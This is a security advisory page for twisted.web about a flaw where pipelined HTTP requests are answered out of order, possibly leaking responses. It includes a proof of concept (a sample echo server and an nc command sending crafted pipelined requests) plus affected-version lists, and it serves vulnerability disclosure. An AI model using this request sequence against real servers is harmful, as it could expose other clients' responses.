GHSA-c8m8-j448-xjx7

Suggest an improvement
Source
https://github.com/advisories/GHSA-c8m8-j448-xjx7
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-c8m8-j448-xjx7/GHSA-c8m8-j448-xjx7.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-c8m8-j448-xjx7
Aliases
Published
2024-07-29T16:33:11Z
Modified
2024-07-29T16:57:00.093908Z
Severity
  • 8.3 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L CVSS Calculator
  • 6.9 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L CVSS Calculator
Summary
twisted.web has disordered HTTP pipeline response
Details

Summary

The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure.

PoC

  1. Start a fresh Debian container:
    docker run --workdir /repro --rm -it debian:bookworm-slim
    
  2. Install twisted and its dependencies:
    apt -y update && apt -y install ncat git python3 python3-pip \
        && git clone --recurse-submodules https://github.com/twisted/twisted \
        && cd twisted \
        && pip3 install --break-system-packages .
    
  3. Run a twisted.web HTTP server that echos received requests' methods. e.g., the following:
    from twisted.web import server, resource
    from twisted.internet import reactor
    
    class TheResource(resource.Resource):
        isLeaf = True
    
        def render_GET(self, request) -> bytes:
            return b"GET"
    
        def render_POST(self, request) -> bytes:
            return b"POST"
    
    site = server.Site(TheResource())
    reactor.listenTCP(80, site)
    reactor.run()
    
  4. Send it a POST request with a chunked message body, pipelined with another POST request, wait a second, then send a GET request on the same connection:
    (printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nPOST / HTTP/1.1\r\nContent-Length: 0\r\n\r\n'; sleep 1; printf 'GET / HTTP/1.1\r\n\r\n'; sleep 1) | nc localhost 80
    
  5. Observe that the responses arrive out of order:
    HTTP/1.1 200 OK
    Server: TwistedWeb/24.3.0.post0
    Date: Tue, 09 Jul 2024 06:19:41 GMT
    Content-Length: 5
    Content-Type: text/html
    
    POST
    HTTP/1.1 200 OK
    Server: TwistedWeb/24.3.0.post0
    Date: Tue, 09 Jul 2024 06:19:42 GMT
    Content-Length: 4
    Content-Type: text/html
    
    GET
    HTTP/1.1 200 OK
    Server: TwistedWeb/24.3.0.post0
    Date: Tue, 09 Jul 2024 06:19:42 GMT
    Content-Length: 5
    Content-Type: text/html
    
    POST
    

Impact

See GHSA-xc8x-vp79-p3wm. Further, for instances of twisted.web HTTP servers deployed behind reverse proxies that implement connection pooling, it may be possible for remote attackers to receive responses intended for other clients of the twisted.web server.

References

Affected packages

PyPI / twisted

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
24.7.0rc1

Affected versions

1.*

1.0.1
1.0.3
1.0.4
1.0.5
1.0.6
1.0.7
1.1.0
1.1.1
1.2.0

2.*

2.1.0
2.4.0
2.5.0

8.*

8.0.0
8.0.1
8.1.0
8.2.0

9.*

9.0.0

10.*

10.0.0
10.1.0
10.2.0

11.*

11.0.0
11.1.0

12.*

12.0.0
12.1.0
12.2.0
12.3.0

13.*

13.0.0
13.1.0
13.2.0

14.*

14.0.0
14.0.1
14.0.2

15.*

15.0.0
15.1.0
15.2.0
15.2.1
15.3.0
15.4.0
15.5.0

16.*

16.0.0
16.1.0
16.1.1
16.2.0
16.3.0
16.3.1
16.3.2
16.4.0
16.4.1
16.5.0rc1
16.5.0rc2
16.5.0
16.6.0rc1
16.6.0
16.7.0rc1
16.7.0rc2

17.*

17.1.0rc1
17.1.0
17.5.0
17.9.0rc1
17.9.0

18.*

18.4.0rc1
18.4.0
18.7.0rc1
18.7.0rc2
18.7.0
18.9.0rc1
18.9.0

19.*

19.2.0rc1
19.2.0rc2
19.2.0
19.2.1
19.7.0rc1
19.7.0
19.10.0rc1
19.10.0

20.*

20.3.0rc1
20.3.0

21.*

21.2.0rc1
21.2.0
21.7.0rc1
21.7.0rc2
21.7.0rc3
21.7.0

22.*

22.1.0rc1
22.1.0
22.2.0rc1
22.2.0
22.4.0rc1
22.4.0
22.8.0rc1
22.8.0
22.10.0rc1
22.10.0

23.*

23.8.0rc1
23.8.0
23.10.0rc1
23.10.0

24.*

24.2.0rc1
24.3.0

Database specific

{
    "last_known_affected_version_range": "<= 24.3.0"
}